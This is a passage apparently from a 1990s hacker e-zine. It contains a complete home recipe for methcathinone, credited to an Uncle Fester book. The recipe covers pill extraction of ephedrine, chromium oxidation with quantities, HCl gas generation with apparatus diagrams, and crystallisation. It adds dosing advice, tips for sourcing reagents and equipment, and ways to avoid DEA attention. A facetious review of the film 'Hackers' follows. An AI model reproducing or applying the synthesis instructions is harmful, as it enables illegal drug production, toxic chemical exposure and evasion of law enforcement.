  618. "This Snow Crash thing- is it a virus, a drug, or a religion?"
  619.         -Hiro Protagonist
  620. "What's the difference?"
  621.         -Juanita Marquez
  622.  
  623. "...one person's 'cyberpunk' is another's everyday obnoxious teenager with
  624. some technical skill thrown in..."
  625.         -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List"
  626. "More than _some_ technical skill."
  627.         -Andy Ryder
  628.  
  629. ------------------------------------------------------------------------------
  630.  
  631.  
  632.                             Making Methcathinone
  633.  
  634.                                   Compiled
  635.  
  636.                                 by Anonymous
  637.  
  638.  
  639. Ok, this has got to be the easiest drug made at home (by far).  This is very
  640. similar to methamphetamine in structure, effect, and use.  Typical doses
  641. start at 20mg up to 60mg.  Start low, go slow.  Cat can be taken orally (add
  642. 10 mg) or through mucous membranes (nasally).
  643.  
  644. Ingredients:
  645. Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine.
  646. Potassium chromate, or dichromate (easily gotten from chem lab. orange/red)
  647. Conc. Sulfuric acid - it's up to you where you get this.  Contact me if you
  648.                       need help locating it.
  649. Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it
  650.                                      is used for cleaning concrete.
  651. Sodium Hydroxide - Hardware stores.  AKA lye.
  652. Toluene - Hardware store, paint store.
  653.  
  654. Lab equipment:
  655. 1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00)
  656. 125 mL separatory funnel - same as above
  657. glass tubing - same as above
  658.  
  659. Buchner funnel - This is a hard to find item, but must schools have at least
  660.                  one.  They are usually white porcelain or plastic.  They look
  661.                  like a funnel with a flat disk in the bottom with lots of
  662.                  holes in it.  If you need one, arrangements can be made.
  663. Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00
  664.  
  665. References to Edmund's Scientific Co, in NJ, are accurate.  You have to go 
  666. to their "Lab Surplus/Mad Scientist" room.  The prices are incredible.  
  667. This place is definitely a recommended stopping sight for anybody going 
  668. through New Jersey.  It is located in "Barrington", about 30 minutes from 
  669. center city Philadelphia.
  670. All of the above can be purchased from "The Al-Chymist".  Their number is
  671. (619)948-4150.  Their address is:       17525 Alder #49
  672.                                        Hesperia, Ca 92345
  673.       Call and ask for a catalog.
  674.  
  675. That's it.  The body of this article is stolen from the third edition of
  676. "Secrets of Methamphetamine Manufacture" by Uncle Fester.  This is a tried
  677. and proven method by many people.  If you want a copy of this book, contact
  678. me.
  679.  
  680.                   Good luck and keep away from the DEA
  681.  
  682.  
  683.                           M E T H C A T H I N O N E
  684.  
  685.              K I T C H E N    I M P R O V I E S E D    C R A N K
  686.  
  687.  
  688.     The latest designer variant upon the amphetamine molecule to gain
  689. popularity and publicity is methcathinone, commonly called cat.  This
  690. substance is remarkably similar to the active ingredient found in the
  691. leaves of the khat tree which the loyal drug warriors on the network news
  692. blame for turning peace loving Somalis into murderous psychopaths.  The
  693. active ingredient in the khat leaves is cathinone, which has the same
  694. structural relationship to methcathinone that amphetamine has to
  695. methamphetamine.  It is made by oxidizing ephedrine, while meth can be
  696. made by reducing ephedrine. 
  697.  
  698.     The high produced by methcathinone is in many ways similar to
  699. methamphetamine.  For something so easily made and purified, it is
  700. actually quite enjoyable.  the main differences between the meth high and
  701. the methcathinone high are length of action and body fell.  With
  702. methcathinone, one can expect to still get to sleep about 8 hours after a
  703. large dose.  On the down side, it definitely gives me the impression that
  704. the substance raises the blood pressure quite markedly.  This drug may not
  705. be safe for people with weak hearts of blood vessels.  Be warned! 
  706.  
  707.     Cat is best made using chrome in the +6 oxidation state as the
  708. oxidizer. I recall seeing an article in the narco swine's Journal of
  709. Forensic Science bragging about how they worked out a method for making it
  710. using permanganate, but that method gives an impure product in low yields. 
  711. Any of the common hexavalent chrome salts can be used as the oxidizer in
  712. this reaction.  This list include chrome trioxide (CrO3), sodium or
  713. potassium chromate (Na2CrO4), and sodium or potassium dichromate
  714. (Na2Cr2O7).  All of these chemicals are very common.  Chrome trioxide is
  715. used in great quantities in chrome plating. The chromates are used in
  716. tanning and leather making. 
  717.  
  718.     To make methcathinone, the chemist starts with the water extract of
  719. ephedrine pills.  The concentration of the reactants in this case is not
  720. critically important, so it is most convenient to use the water extract of
  721. the pills directly after filtering without any boiling away of the water.
  722. See the section at the beginning of Chapter 15 [I included this at the end
  723. of the file] on extracting ephedrine form pills.  Both ephedrine
  724. hydrochloride and sulfate can be used in this reaction. 
  725.  
  726.     The water extract of 1000 ephedrine pills is placed into any
  727. convenient glass container.  A large measuring cup is probably best since
  728. it has a pouring lip.  Next, 75 grams of any of the above mentioned +6
  729. chrome compounds are added.  They dissolve quite easily to form a reddish
  730. or orange colored solution.  Finally, concentrated sulfuric acid is added. 
  731. If CrO3 is being used, 21 mL is enough for the job.  If one of the
  732. chromates is being used, 42 mL is called for.  These ingredients are
  733. thoroughly mixed together, and allowed to sit for several hours with
  734. occasional stirring. 
  735.  
  736.     After several hours have passed, lye solution is added to the batch
  737. until it is strongly basic. Very strong stirring accompanies this process
  738. to ensure that the cat is converted to the free base.  Next, the batch is
  739. poured into a sep funnel, and a couple hundred mLs of toluene is added.
  740. Vigorous shaking, as usual, extracts the cat into the toluene layer.  It
  741. should be clear to pale yellow in color.  The water layer should be orange
  742. mixed with green.  The green may settle out as a heavy sludge.  The water
  743. layer is thrown away, and the toluene layer containing the cat is washed
  744. once with water, then poured into a beaker. Dry HCl gas is passed through
  745. the toluene as described in Chapter 5 [I included this at the end of the file]
  746. to get white crystals of cat.  The yield is between 15 and 20
  747. grams.  This reaction is scaled up quite easily. 
  748.  
  749.  
  750. CHAPTER 15 (part of it anyway)
  751.  
  752.  P R O C E D U R E   F O R   O B T A I N I N G   P U R E   E P H E D R I N E
  753.                    F R O M   S T I M U L A N T   P I L L S
  754.  
  755.     In the present chemical supply environment, the best routes for making
  756. meth start with ephedrine as the raw material.  To use these routes, a
  757. serious hurdle must first be overcome.  This hurdle is the fact that the
  758. most easily obtained source of ephedrine, the so-called stimulant or
  759. bronchodilator pills available cheaply by mail order, are a far cry from
  760. the pure starting material a quality minded chemist craves.  Luckily,
  761. there is a simple and very low profile method for separating the fillers
  762. in these pills from the desired active ingredient they contain. 
  763.  
  764.     A superficial paging through many popular magazines[New Body is where
  765. I found it at GNC] reveals them to be brim full of ads
  766. from mail order outfits offering for sale "stimulant" or "bronchodilator"
  767. pills. These are the raw materials today's clandestine operator requires
  768. to manufacture meth without detection.  The crank maker can hide amongst
  769. the huge herd of people who order these pills for the irritating and
  770. nauseating high that can be had by eating them as is.  I have heard of a
  771. few cases where search warrants were obtained against people who ordered
  772. very large numbers of these pills, but I would think that orders of up to
  773. a few thousand pills would pass unnoticed.  If larger numbers are
  774. required, maybe one's friends could join in the effort. 
  775.  
  776.     The first thing one notices when scanning these ads is the large
  777. variety of pills offered for sale. When one's purpose is to convert them
  778. into methamphetamine, it is very easy to eliminate most of the pills
  779. offered for sale.  Colored pills are automatically rejected because one
  780. does not want the coloring to be carried into the product.  Similarly,
  781. capsules are rejected because individually cutting open capsules is just
  782. too much work. Bulky pills are to be avoided because they contain too much
  783. filler.  The correct choice is white cross thins, preferably containing
  784. ephedrine HCl instead of sulfate, because the HCl salt can be used in more
  785. of the reduction routes than can the sulfate. 
  786.  
  787.     Once the desired supply of pills is in hand, the first thing which
  788. should be done is to weigh them.  This will give the manufacturer an idea
  789. of how much of the pills is filler, and how much is active ingredient. 
  790. Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle
  791. contains 25 grams of active ingredient.  A good brand of white cross thins
  792. will be around 33% to 40% active ingredient.  25 grams of ephedrine HCl
  793. may not sound like much, but if it is all recovered from these pills, it
  794. is enough to make from 1/2 to 3/4 ounce of pure meth.  This is worth three
  795. or four thousand dollars, not a bad return on the twenty odd dollars a
  796. thousand lot of such pills costs. [I don't know where he got 3 or 4
  797. thousand dollars from, but the pills go for about $35.00/1000 now. 2
  798. months ago they were $25.00 but now they have to do more paper work
  799. because it is a DEA controlled substance]
  800.  
  801.     To extract the ephedrine from the pills, the first thing which must be
  802. done is to grind them into a fine powder.  This pulverization must be
  803. thorough in order to ensure complete extraction of the ephedrine form the
  804. filler matrix in which it is bound.  A blender does a fine job of this
  805. procedure, as will certain brands of home coffee grinders. 
  806.  
  807.     Next, the powder from 1000 pills is put into a glass beaker, or other
  808. similar container having a pouring lip, and about 300 mL of distilled
  809. water is added.  Gentle heat is then applied to the beaker, as for example
  810. on a stove burner, and with steady stirring the contents of the beaker are
  811. slowly brought up to a gentle boil.  It is necessary to stir constantly
  812. because of the fillers will settle to the bottom of the beaker and cause
  813. burning if not steadily stirred. 
  814.  
  815.     Once the contents of the beaker have been brought to a boil, it is
  816. removed from the heat and allowed to settle.  Then the water is poured out
  817. of the beaker through a piece of filter paper.  The filtered water should
  818. be absolutely clear.  Next, another 50 mL of water is added to the pill
  819. filler sludge, and it too is heated with stirring.  Finally, the pill
  820. sludge is poured into the filter, and the water it contains is allowed to
  821. filter through.  It too should be absolutely clear, and should be mixed in
  822. with the first extract.  A little water may be poured over the top of the
  823. filler sludge to get the last of the ephedrine out of it.  This sludge
  824. should be nearly tasteless, and gritty in texture.  The water extract
  825. should taste very bitter, as it contains the ephedrine. 
  826.  
  827.     The filtered water is now returned to the stove burner, and half of
  828. the water it contains is gently boiled away.  Once this much water has
  829. been boiled off, precautions should be taken to avoid burning the
  830. ephedrine.  The best alternative is to evaporate the water off under a
  831. vacuum.  If this is not practical with the equipment on hand, the water
  832. may be poured into a glass baking dish.  This dish is then put into the
  833. oven with the door cracked open, and the lowest heat applied.  In no time
  834. at all, dry crystals of ephedrine HCl can be scraped out of the baking
  835. dish with a razor blade. The serious kitchen experimenter may wish to
  836. further dry them in a microwave. 
  837.  
  838. Chapter 5 (The part about the HCl gas)
  839.  
  840.     A source of anhydrous hydrogen chloride gas is now needed.  The
  841. chemist will generate his own.  The glassware is set up as in Figure 1. 
  842. He will have to bend another piece of glass tubing to the shape shown.  It
  843. should start out about 18 inches long.  One end of it should be pushed
  844. through a one hole stopper.  A 125 mL sep funnel is the best size.  The
  845. stoppers and joints must be tight, since pressure must develop inside this
  846. flask to force the hydrogen chloride gas out through the tubing as it is
  847. generated. 
  848.  
  849.     Into the 1000 mL, three-necked flask is placed 200 grams of table
  850. salt. Then 25% concentrated hydrochloric acid is added to this flask until
  851. it reaches the level shown in the figure.  The hydrochloric acid must be
  852. of laboratory grade [I use regular muriatic acid for pools].
  853.  
  854. Figure 1:
  855.                    \     /
  856.                   ╓─\   /──╖
  857.                  ╓╜        ╙╖   <--125 mL separatory funnel
  858.                  ║          ║
  859.                  ║          ║
  860.                  ╙╖        ╓╜
  861.                   ╙─╖    ╓─╜        glass tubing ─┐
  862.                     ╙╖  ╓╜                        
  863.                      ║  ║         ╔═══════════════╗
  864.            stopcock->║██║──┤      ║               ║Salt and Hydrochloric acid
  865. stopper ->╓───╖     ╓╨\/╨╖      ╓─╨─╖ <-1 hole    ║mixed into a paste by add-
  866.           ║───║     ║    ║      ║─╥─║    stopper  ║ing HCL to salt and mixing.
  867.       ╓───╜   ╙─────╜    ╙──────╜ ║ ╙───╖         ║The surface should be rough
  868.      ╓╜                           ║     ╙╖        ║and a good number of holes
  869.      ║                                   ║        ║should be poked into the
  870.      ║       1000 mL, 3 neck flask       ║        ║paste for long lasting
  871.      ║                                   ║        ║generation of HCl gas.
  872.      ╙╖   ──────acid/salt level──────   ╓╜        ║
  873.       ╙─╖                             ╓─╜         ║
  874.         ╙──╖                       ╓──╜           ║
  875.            ╙──────╖         ╓──────╜              ║
  876.                   ╙─────────╜                     ║
  877.  
  878.  
  879.     Some concentrated sulfuric acid (96-98%) is put into the sep funnel
  880. and the spigot turned so that 1 mL of concentrated sulfuric acid flows
  881. into the flask.  It dehydrates the hydrochloric acid and produces hydrogen
  882. chloride gas. This gas is then forced by pressure through the glass
  883. tubing. 
  884.  
  885.     One of the Erlenmeyer flasks containing methamphetamine in solvent is
  886. placed so that the glass tubing extends into the methamphetamine, almost
  887. reaching the bottom of the flask.  Dripping in more sulfuric acid as
  888. needed keeps the flow of gas going to the methamphetamine.  If the flow if
  889. gas is not maintained, the methamphetamine may solidify inside the glass
  890. tubing, plugging it up. 
  891.  
  892.     Within a minute of bubbling, white crystals begin to appear in the
  893. solution, More and more of them appear as the process continues.  It is an
  894. awe-inspiring sight.  In a few minutes, the solution becomes as thick as
  895. watery oatmeal. 
  896.  
  897.     It is now time to filter out the crystals, which is a two man job. 
  898. The flask with the crystals in it is removed from the HCl source and
  899. temporarily set aside.  The three-necked flask is swirled a little to
  900. spread around the sulfuric acid and then the other Erlenmeyer flask is
  901. subjected to a bubbling with HCl.  While this flask is being bubbled, the
  902. crystals already in the other flask are filtered out. 
  903.  
  904.     The filtering flask and Buchner funnel are set up as shown in figure
  905. 2. The drain stem of the buchner funnel extends all the way through the
  906. rubber stopper, because methamphetamine has a nasty tendency to dissolve
  907. rubber stoppers.  This would color the product black.  A piece of filter
  908. paper covers the flat bottom of the Buchner funnel.  The vacuum is turned
  909. on and the hose attached to the vacuum nipple.  Then the crystals are
  910. poured into the Buchner funnel.  The solvent and uncrystallized
  911. methamphetamine pass through the filter paper and the crystals stay in the
  912. Buchner funnel as a solid cake.  About 15 mL of solvent is poured into the
  913. Erlenmeyer flask. the top of the flask is covered with the palm and it is
  914. shaken to suspend the crystals left clinging to the sides.  This is also
  915. poured into the Buchner funnel.  Finally, another 15 mL of solvent is
  916. poured over the top of the filter cake. 
  917.  
  918.  
  919. Figure 2:
  920.                               ┌───────────┐
  921.                               │           │ <-Büchner Funnel
  922.                               │___________│
  923.                               \           /
  924.                                 \       /
  925.                                   \   /
  926.                                  ┌──────┐
  927.                                  │      │»»»» <--To vacuum
  928.                                ┌─┘      └─┐
  929.                                │          │
  930.                                │          │
  931.                              ┌─┘          └─┐
  932.               Filtering      │              │
  933.                   flask-->  ┌┘              └┐
  934.                             │                │
  935.                             └────────────────┘
  936.  
  937.  
  938.     Now the vacuum hose is disconnected and the Buchner funnel, stopper
  939. and all, is pulled from the filtering flask.  All of the filtered solvent
  940. is poured back into the erlenmeyer flask it came from.  It is returned to
  941. the HCl source for more bubbling.  The Buchner funnel is put back into the
  942. top of the filtering flask.  It still contains the filter cake of
  943. methamphetamine crystals.  It will now be dried out a little bit.  The
  944. vacuum is turned back on, the vacuum hose is attached to the filtering
  945. flask, and the top of the Buchner funnel is covered with the palm or
  946. section of latex rubber glove.  The vacuum builds and removes most of the
  947. solvent from the filter cake.  This takes about 60 seconds.  The filter
  948. cake can now be dumped out onto a glass or China plate (not plastic) by
  949. tipping the Buchner funnel upside-down and tapping it gently on the plate. 
  950.  
  951.     And so, the filtering process continues, one flask being filtered
  952. while the other one is being bubbled with HCl.  Solvent is added to the
  953. Erlenmeyer flask to keep their volumes at 300 mL.  Eventually, after each
  954. flask has been bubbled for about seven times, no more crystal will come
  955. out and the underground chemist is finished. 
  956.  
  957.     If ether was used as the solvent, the filter cakes on the plates will
  958. be nearly dry now.  With a knife from the silverware drawer, the cakes are
  959. cut into eighths.  They are allowed to dry out some more then chopped up
  960. into powder.  If benzene was used, this process takes longer.  Heat lamps
  961. may be used to speed up this drying, but no stronger heat source. 
  962.  
  963. [The above section of chapter 5 is talking about methamphetamine.  You
  964. could, in most instances, substitute the word methcathinone, but I wanted
  965. to present the text to you in its exact form.]
  966.  
  967.  
  968. ------------------------------------------------------------------------------
  969.  
  970.  
  971. Review of "HACKERS"
  972.  
  973. By Wile Coyote
  974.  
  975. Sorry, it might be a little long...  cut it to ribbons if you want, most 
  976. of it is just a rant anyway...  Hope you enjoy it.
  977.  
  978.   First off, I have to admit that I was biased going into the movie 
  979. "Hackers"...  I heard that it wasn't going to be up to snuff, but did I 
  980. let that stop me?  No, of course not...  I sucked up enough courage to 
  981. stride towards my girlfriend and beg for seven bucks... :)  She ended up 
  982. wanting to see the movie herself (and sadly, she rather enjoyed it...  
  983. oh, well, what can you do with the computer illiterate or is it the 
  984. computer illegitimate?). Now onto....
  985.  
  986. THE MOVIE
  987.  
  988.   (Yes, I AM going to give you a second-by-second playback of the 
  989. movie...  you don't want me to spoil the plot, you say?  Well, don't 
  990. worry, there is no plot to spoil! :) just kidding, go see it... maybe 
  991. you'll like it...)
  992.  
  993.   Well, from the very first few seconds, I was unimpressed...  It begins 
  994. with an FBI raid on some unsuspecting loose (who turns out to be the 
  995. main character, but that's later) named Zero Cool (can you say "EL1EEEEET 
  996. WaReZ D00D!!!!!!!1!!!!!111!!!!").  The cinematography was bad...  (Hey, 
  997. cinematography counts!) But, the acting was worse.  The Feds bust into 
  998. this home and run up the stairs, all while this lady (the mom) just kind 
  999. of looks on dumbfounded and keeps saying stuff like "hey, stop that...", 
  1000. or something (is this what a raid is like?  I've never had the pleasure...)
  1001.  
  1002. Ok, so the story goes on like this:  The 11 year old kid made a computer 
  1003. virus that he uploads to, I think, the NY stock exchange, and it crashes 
  1004. 1,507 computers.  There is a really lame court scene where the kid is 
  1005. sentenced to 7 years probation where he can't use a computer or a 
  1006. touch-tone phone...  That was 1988...
  1007.  
  1008. Time passes...  Now it's 1995, and boy have things changed (except the 
  1009. mom... hmmm....).  Now the ex-hacker is allowed to use a computer (his 
  1010. 18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) 
  1011. boxing some TV station to change the program on television (yes, I know 
  1012. that all of you super-el33t hackers hack into TV stations when you don't 
  1013. like what's on Ricki Lake!).  N-e-way, while hacking into their 
  1014. super-funky system (the screen just kind of has numbers moving up and 
  1015. down the screen like some kind of hex-editor on acid...)
  1016. he gets into a "hacking battle" with some other hacker called Acid Burn 
  1017. (I don't think I have ever seen such a trippy view of the "Internet"...  
  1018. lots of Very high-end graphics, not very realistic, but it's Hollywood...).
  1019. In the end, the other hacker kicks the shit out of him (he has changed 
  1020. his handle to Crash Override now, just to be cool, i guess) and logs him 
  1021. off the TV station.  Wow, tense... cough...
  1022.  
  1023. For those of you who care, let me describe the "hacker" Crash Override:  
  1024. He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is 
  1025. (kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) 
  1026. clothes, and the CDC might have quite a bit to say about the amount of 
  1027. leather he wears... I mean, there are limits to that kind of stuff, man!
  1028. And to top off his coolness, he is, like, the roller-blade king of the 
  1029. world.  (Not that hackers don't roller-blade, but he does it just Soooo 
  1030. much cooler than I could... :) ).  And yet, here's the nifty part, 
  1031. despite all of his deft coolness, he couldn't get a girl for the life 
  1032. of him (we all morn for him in silent prayer).  
  1033.  
  1034. Ok, so now Crash is at school, and he meets Wonderchick (who is 
  1035. EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she 
  1036. is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to 
  1037. spoil the suspense).
  1038.  
  1039. Now, while at school, he wants to hook up with wonderchick, so he breaks 
  1040. into the school's computer (it must be a fucking Cray to support all of 
  1041. the high-end-type graphics that this dude is pulling up) and gets his 
  1042. English(?) class changed to hers.  So, some other super-d00dcool hacker 
  1043. spots him playing around with the schools computer (it's funny how may 
  1044. elite hackers one can meet in a new york public school...), so he 
  1045. catches up with Crash and invites you to an elite (Oh, if you ever want 
  1046. to see a movie where the word 3l333333333t is used, like a fucking 
  1047. million times, then go see Hackers...) hackerz-only club, complete with 
  1048. million-dollar virtual-reality crap and even a token phreaker trying to 
  1049. red-box a pay-phone with a cassette recorder (never mind that the music is 
  1050. about 197 decibels, the phone can still pick up the box tones...).
  1051.  
  1052. What follows is that Crash meets up with some seriously k-rad hackers 
  1053. (Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and  
  1054. Phantom Phreak : who reminds of that gay kid on "my so called life...  
  1055. maybe that was him?";Lord Nikon : the token black hacker... Photographic 
  1056. memory is his super-power).  They talk about k00l pseudo-hacker shit and 
  1057. then a l00ser warez-type guy comes up and tries to be El33t like everybody 
  1058. else.  He is just about the ONLY realistic character in the whole movie.  
  1059. He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?".  He keeps 
  1060. saying "I need a handle, then I'll be el33t!".  (Why he can't just pick 
  1061. his own handle, like The Avenging Turd or something, is beyond me... He 
  1062. plays lamer better than the kids in Might Morphin Power Rangers...  awesome 
  1063. actor!).  N-e-way, this is where the major discrepancies start.  Ok, 
  1064. first they try to "test" Lamerboy by asking him what the four most used 
  1065. passwords are.  According to the movie, they are "love, sex, god, and 
  1066. secret".  (Hmmmm.... I thought Unix required a 6-8 char. password....).  
  1067. Somehow lamerboy got into a bank and screwed with an ATM machine four 
  1068. states away; all of the hacker chastise him for being stupid and hacking 
  1069. at home (If you watch the movie, you'll notice that the hackers use just 
  1070. about every pay-phone in the city to do their hacking, no, THAT doesn't 
  1071. look suspicious)Next they talk about "hacking a Gibson".  
  1072. (I was informed that they WANTED to use "hacking a Cray", 
  1073. but the Cray people decided that they didn't want THAT kind of publicity.  
  1074. I've never heard of a Gibson in real life, though...).  
  1075. They talk about how k-powerful the security is on a Gibson, and they say 
  1076. that if Lamerboy can crack one, then he gets to be elite.  
  1077.  
  1078. Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash 
  1079. loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy 
  1080. finally cracks a Gibson with the password God (never mind a Login name or 
  1081. anything that cool).  Then the cheese begins in full force.  The Gibson 
  1082. is like a total virtual-reality thingy.  Complete with all sorts of cool 
  1083. looking towers and neon lightning bolts and stuff.  Lamerboy hacks into a 
  1084. garbage file (did I mention that the entire world is populated by Macs?  
  1085. Oh, I didn't...   well, hold on :)...).  So, this sets alarms off all 
  1086. over the place (cause a top-secret file is hidden in the garbage, see?), 
  1087. and the main bad-guy, security chief Weasel, heads out to catch him.  He 
  1088. plays around with some neon, star-trek-console, buttons for a while, 
  1089. then calls the "feds" to put a trace on the kid.  La de da, ess catches him 
  1090. in a second, and the kid only gets half of the file, which he hides.
  1091. (to spoil the suspense, yet again, the file is some kind of money getting 
  1092. program, like the kind some LOD members wrote about a long time ago in 
  1093. Phrack, which pulls money from each transaction and puts it into 
  1094. a different account.  Needless to say, the Security Weasel is the guy who 
  1095. wrote it, which is why he needs it back, pronto!).
  1096.  
  1097. As we travel along the movie, the hackers keep getting busted for tapping 
  1098. into the Gibson, and they keep getting away.  The "action" heats up when 
  1099. Wonderchick and Crash get into a tiff and they decide to have a hacking 
  1100. contest...  They go all over the city trying their best to fuck with 
  1101. the one fed they don't like....  Brilliant move, eh? The movie kind of 
  1102. reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop.
  1103. They all fondle over the machine with the same intensity that Captain Kirk 
  1104. gave to fighting Klingons, and frankly, their acting abilities seems 
  1105. to ask "please deposit thirty-five cents for the next three minutes". 
  1106. It was funny listening to the actors, 'cause they didn't know shit about 
  1107. what they were saying...  Here's a clip:
  1108.  
  1109. Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem...  Not 
  1110. Kbps, mind you :)...I wonder where they designed a .8 of a bit?)
  1111.  
  1112. Yeah! Cool... Hey what kind of chip does it have in it?
  1113.  
  1114. A P6!  Three times faster than a Pentium....  Yep, RISC is the wave of 
  1115. the future...  (I laughed so hard.....  Ok, first of all, it is a Mac.  
  1116. Trust me, it has the little apple on the cover.  Second it has a P6, what 
  1117. server she ripped this out of, I dare not ask.  How she got that 
  1118. bastard into a laptop without causing the casing to begin melting is 
  1119. yet another problem...  those get very hot, i just read about them 
  1120. in PC magazine (wow, I must be elite too).  Finally, this is a *magic* P6, 
  1121. because it has RISC coding....  
  1122.  
  1123. I kinda wished I had stayed for the credits to see the line: 
  1124.  
  1125. Technical advisor                      None.... died on route to work...)
  1126.  
  1127. Finally they ask something about the screen, and they find out it is 
  1128. an..... hold your breath.... ACTIVE MATRIX! ... Kick ass!
  1129.  
  1130. They do lots of nifty things with their magic laptops (I noticed that they 
  1131. ALL had laptops, and they were ALL Macintoshes.  Now, I'm not one to say 
  1132. you can't hack on a mac, 'cause really you can hack on a TI-81 if you've 
  1133. got the know.... but please, not EVERYONE in the fucking movie 
  1134. has to have the exact same computer (different colors, though... there 
  1135. was a really cool clear one).... it got really sad at the end), and they 
  1136. finally find out what the garbage file that Lamerboy stole was, this time 
  1137. using a hex editor/CAD program of some sort.
  1138.  
  1139. As we reach the end of the movie, the hackers enlist the help of two very 
  1140. strangely painted phone phreaks who give the advice to the hackers to send 
  1141. a message to all of the hackers on the 'net, and together, they all 
  1142. kicked some serious ass with the super-nifty-virtual-reality Gibson.
  1143.  
  1144. In the end, all of the Hackers get caught except for one, who pirates all 
  1145. of the TV station in the world and gives the police the "real" story...  
  1146. So, the police politely let them go, no need for actually proving that the 
  1147. evidence was real or anything, of course.
  1148.  
  1149. So, in the end, I had to say that the movie was very lacking.  It seemed 
  1150. to be more of a Hollywood-type flashy movie, than an actual documentary 
  1151. about hackers.  Yes, I know an ACTUAL movie about hacker would suck, but 
  1152. PLEASE, just a LITTLE bit of reality helps keep the movie grounded.  It 
  1153. may have sucked less if they didn't put flashing, 64 million color, 
  1154. fully-rendered, magically delicious pictures floating all over the screen 
  1155. instead of just a simple "# " prompt at the bottom.  With all of the 
  1156. super-easy access to all of the worlds computers, as depicted in the movie, 
  1157. ANYBODY can be a hacker, regardless of knowledge, commitment, or just 
  1158. plain common sense.  And that's what really made it suck... 
  1159.  
  1160. Hope you enjoyed my review of HACKERS!
  1161.  
  1162.  
  1163.  
  1164.